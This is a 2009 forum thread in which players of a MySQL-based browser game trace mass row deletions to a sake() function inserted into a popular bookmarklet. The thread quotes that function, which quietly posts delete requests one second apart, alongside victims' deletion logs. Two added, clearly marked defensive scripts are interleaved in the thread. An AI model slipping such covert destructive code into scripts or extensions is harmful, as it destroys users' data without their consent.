Problem on Shard1 ?


Nicolas

Oct 14, 2009, 7:57:07 PM
to mysqlgame
Just noticed that some of my rows, spanning from 8450 to 8460,
disappeared today :/ Some of my lines are still there though (8461 to
8468).

Is there some kind of problem with Shard1's data, or something going
on ?

Nicolas

Trohs

Oct 17, 2009, 9:33:13 PM
to mysqlgame
I had an enormous problem.

I lost all my rows (except one). I really don't know what happened, I
didn't give any order, it happened just after I logged in.
First of all, I want my rows back (don't really know if it is
possible); secondly, I would like to know what the function sake()
does in the bookmarklet code.

Trohs

Oct 17, 2009, 9:41:08 PM
to mysqlgame
BTW, I used to own rows 18, 52, 55, 145, 200 (my first row), 201, 202,
203, 204, 206, 207, 208, 209, 237, 641, 642, 643, 916, 929, 943, 1296
on shard 2. Now I have just row 1297.

Other thing: I lost them all of a sudden, it wasn't hacking. I really
believe it was the bookmarklet code.

http://mysqlgame-ui-update.googlecode.com/svn/trunk/BrianUiUpdate.js

Dolithe

Oct 18, 2009, 12:19:31 AM
to mysqlgame
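function sake(){
    // getMyRows() is defined elsewhere in the bookmarklet
    var rows = getMyRows();
    var calls = [];
    for(var i = 0; i < rows.length; i++){
        // queue one DeleteCurrentRow request per entry in rows
        calls.push(function(){ $.post("/update/queries",
            {row_id: rows[i], "query":"DeleteCurrentRow","submit": "go"});
        });
    }
    var sec = 1;
    for(var i = 0; i < calls.length; i++){
        var fn = calls[i];
        // schedule the queued requests one second apart
        setTimeout(fn, sec * (i+1) * 1000);
    }
}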

Added in checkin r84 by jesscold on Oct 14/2009... looks like it does
indeed delete rows some time after logging in, slowly, by putting a
delay between row deletions....

timlash

Oct 18, 2009, 12:00:59 PM
to mysqlgame
I'd like to congratulate whomever is going by the name jesscold upon
achieving true Shit-Head status. Your mother must be proud.

Since realizing this exact problem was a real possibility as pointed
out to me by mook:

http://groups.google.com/group/mysqlgame/browse_thread/thread/294c55b5b801ad98

I've been hosting my own copy of version 2.4 of the bookmarklet.
I've created a new Google code project to support this old version:

http://code.google.com/p/mysqlgame-safe-ui/

Update your bookmarklets to point to this new project. I have no
plans to further update this bookmarklet, but I will try to maintain
ownership of this project to keep malicious code out. The best
defense is to host a version of this yourself. Not sure how jesscold
was able to gain ownership of the mysqlgame-ui-update project in order
to insert the sake() function.
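
An added example, not part of the post above or of either bookmarklet project: one way to review an upstream revision against a self-hosted copy before switching to it, by listing functions that are new or changed and whether they send requests. The script contents are constructed stand-ins, renderPanel is a hypothetical name, and the sake body is abbreviated from the one quoted in this thread.

```javascript
// Constructed stand-ins: a reviewed, self-hosted copy and a later upstream
// revision. renderPanel is hypothetical; sake is abbreviated from the thread.
const REVIEWED = `
function getMyRows(){ return []; }
function renderPanel(){ $("#panel").show(); }
`;
const UPSTREAM = `
function getMyRows(){ return []; }
function renderPanel(){ $("#panel").show(); }
function sake(){ $.post("/update/queries", {query: "DeleteCurrentRow"}); }
`;

// Map each named "function name(...){...}" to its source text by brace
// matching (a heuristic: braces inside strings or comments are not handled).
function extractFunctions(src) {
  const fns = new Map();
  const re = /function\s+([A-Za-z_$][\w$]*)\s*\(/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    const open = src.indexOf("{", m.index);
    if (open < 0) break;
    let depth = 0, i = open;
    for (; i < src.length; i++) {
      if (src[i] === "{") depth++;
      else if (src[i] === "}" && --depth === 0) break;
    }
    fns.set(m[1], src.slice(m.index, i + 1));
    re.lastIndex = i + 1; // continue scanning after this function's body
  }
  return fns;
}

// Report functions that are new or changed relative to the reviewed copy,
// and whether each one contains a call that sends a request.
function auditUpdate(reviewedSrc, upstreamSrc) {
  const before = extractFunctions(reviewedSrc);
  const findings = [];
  for (const [name, body] of extractFunctions(upstreamSrc)) {
    if (before.get(name) === body) continue; // unchanged since review
    findings.push({
      name,
      status: before.has(name) ? "changed" : "new",
      sendsRequest: /\$\.(post|ajax)\s*\(|XMLHttpRequest|fetch\s*\(/.test(body),
    });
  }
  return findings;
}
```

An empty result means every named function is byte-identical to the reviewed copy; anything else is what needs reading before the bookmarklet is pointed at the new revision.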

Trohs

Oct 18, 2009, 1:26:49 PM
to mysqlgame
http://www.flickr.com/photos/leovailati/4022322029/

According to the screenshot I took right after I realized what
happened, there was a one-second delay between the deletions.

Rylos

Oct 18, 2009, 8:59:25 PM
to mysqlgame
Yep. Got me too.

Today 00:56:56 DELETE FROM rows WHERE row_id=459 0.083
Today 00:56:55 DELETE FROM rows WHERE row_id=458 0.087
Today 00:56:54 DELETE FROM rows WHERE row_id=219 0.083
Today 00:56:53 DELETE FROM rows WHERE row_id=217 0.126
Today 00:56:52 DELETE FROM rows WHERE row_id=215 0.327
Today 00:56:51 DELETE FROM rows WHERE row_id=39 0.112
Today 00:56:50 DELETE FROM rows WHERE row_id=218 0.189

Trohs

Oct 18, 2009, 10:11:34 PM
to mysqlgame
Where are the admins? We want our rows back.
This was clearly not our fault. Bookmarklet is legal, right? I can't
verify its code every time I want to use it.
Also, please ban this jesscold from the game (if that is possible).

Sun 01:09:39 DELETE FROM rows WHERE row_id=1296
Sun 01:09:38 DELETE FROM rows WHERE row_id=943
Sun 01:09:37 DELETE FROM rows WHERE row_id=929
Sun 01:09:36 DELETE FROM rows WHERE row_id=916
Sun 01:09:35 DELETE FROM rows WHERE row_id=643
Sun 01:09:34 DELETE FROM rows WHERE row_id=642
Sun 01:09:33 DELETE FROM rows WHERE row_id=641
Sun 01:09:32 DELETE FROM rows WHERE row_id=237
Sun 01:09:31 DELETE FROM rows WHERE row_id=209
Sun 01:09:30 DELETE FROM rows WHERE row_id=208
Sun 01:09:29 DELETE FROM rows WHERE row_id=207
Sun 01:09:28 DELETE FROM rows WHERE row_id=206
Sun 01:09:27 DELETE FROM rows WHERE row_id=204
Sun 01:09:27 DELETE FROM rows WHERE row_id=203
Sun 01:09:25 DELETE FROM rows WHERE row_id=202
Sun 01:09:24 DELETE FROM rows WHERE row_id=201
Sun 01:09:23 DELETE FROM rows WHERE row_id=145
Sun 01:09:22 DELETE FROM rows WHERE row_id=55
Sun 01:09:21 DELETE FROM rows WHERE row_id=52
Sun 01:09:20 DELETE FROM rows WHERE row_id=18
Sun 01:09:19 DELETE FROM rows WHERE row_id=200
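
An added example, not part of the post above: a small detector for the pattern visible in these query histories, a run of DELETEs spaced about one second apart. The sample log is constructed in the same format (newest entry first), and the gap and run-length thresholds are assumptions.

```javascript
// Constructed sample in the query-history format quoted in this thread
// (newest entry first): "<day> HH:MM:SS <SQL> [duration]".
const SAMPLE_LOG = `
Sun 01:09:23 DELETE FROM rows WHERE row_id=145
Sun 01:09:22 DELETE FROM rows WHERE row_id=55
Sun 01:09:21 DELETE FROM rows WHERE row_id=52
Sun 01:09:20 DELETE FROM rows WHERE row_id=18
Sun 01:09:19 DELETE FROM rows WHERE row_id=200
Sat 22:40:02 DELETE FROM rows WHERE row_id=7
Sat 18:15:45 DELETE FROM rows WHERE row_id=3
`;

const LINE_RE = /^(\S+) (\d\d):(\d\d):(\d\d) DELETE FROM rows WHERE row_id=(\d+)/;

// Parse DELETE entries into {day, t (seconds since midnight), rowId},
// returned oldest first.
function parseDeletes(logText) {
  const out = [];
  for (const line of logText.split("\n")) {
    const m = LINE_RE.exec(line.trim());
    if (!m) continue; // not a row deletion, or not a log line
    out.push({ day: m[1], t: +m[2] * 3600 + +m[3] * 60 + +m[4], rowId: +m[5] });
  }
  return out.reverse();
}

// Group deletes whose gap to the previous one is at most maxGapSec and
// return the groups with at least minRun entries (both thresholds assumed).
// Runs that cross midnight are split, since only a day label is logged.
function findDeleteBursts(logText, maxGapSec = 2, minRun = 5) {
  const bursts = [];
  let run = [];
  for (const d of parseDeletes(logText)) {
    const prev = run[run.length - 1];
    const gap = prev && prev.day === d.day ? d.t - prev.t : Infinity;
    if (run.length && gap >= 0 && gap <= maxGapSec) {
      run.push(d);
    } else {
      if (run.length >= minRun) bursts.push(run);
      run = [d];
    }
  }
  if (run.length >= minRun) bursts.push(run);
  return bursts.map(r => ({
    day: r[0].day, startSec: r[0].t, endSec: r[r.length - 1].t,
    rowIds: r.map(d => d.rowId),
  }));
}
```

The two isolated Saturday deletions in the sample are ignored; only the five-entry run at one-second spacing is reported.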

Rylos

Oct 19, 2009, 10:14:41 PM
to mysqlgame
I am sorry to say it's our own fault and I doubt they will do
anything. It was no big deal for me but to see you lose your rows,
Trohs, just pisses me off. You've been super active and a much more
advanced player than I was.

I am only glad that I didn't start increasing my row count like I had
planned.

Rylos

Oct 19, 2009, 10:19:06 PM
to mysqlgame
So how exactly did this asshat take over the project and screw us
over?

timlash

Oct 20, 2009, 12:02:41 AM
to mysqlgame
Three ways are most likely, and I listed them in order of likelihood.
Either,

1) jesscold is a pseudonym for a former contributor or owner to the
original project who knew the project's password.

2) He wasn't related to anyone associated with the original project,
but used or discovered a weakness with GoogleCode repository like the
example below:

http://www.h-online.com/newsticker/news/item/Password-theft-via-vulnerability-in-Google-code-734815.html

or

3) He used a brute force trial and error attack to discover the
password and then took ownership of the project. This would entail
trying each one of 107,518,933,731 password possibilities (based on a
random 12 digit camel cased alpha-numeric password like the one Google
generated for the new project I created, or 461,738,052,776
possibilities if Google allows repeating characters in the same
password) until access was granted. Google will not allow you to
choose a password, but project owners can generate another random one
at any time.


Option 1 is far and away the most probable explanation. The
vulnerability described in the link was supposedly patched by Google
and I would think Google's security protocols are better than most. A
brute force attack would take a loooooong time or phenomenal luck.
Unfortunately, we'll probably never know.

Trohs

Oct 20, 2009, 4:54:22 PM
to mysqlgame
Yep, I guess you're right. Sorry about the irrational revolt moments
=D
In my perception, this game was basically offline (I was alone in shard
2), there should be at least 100 active players on each shard for the
game to accomplish the fun I was expecting.
Anyway, the idea of a MMO without any background, just rows on a mysql
table is phenomenal (geeky too). Unfortunately, the blogosphere buzz
didn't last long and soon people discovered that playing the game was
not easy at all. This, culminating with the disappearance of the devs,
made the game empty and boring.
I kept playing until now because I didn't want to lose all my work
(one year ago I logged in twice a day to see my rows, my precious rows
=D).

Having now no reasons to keep playing, I say goodbye and good luck for
those who stay.
I guess it didn't happen the way I thought it would.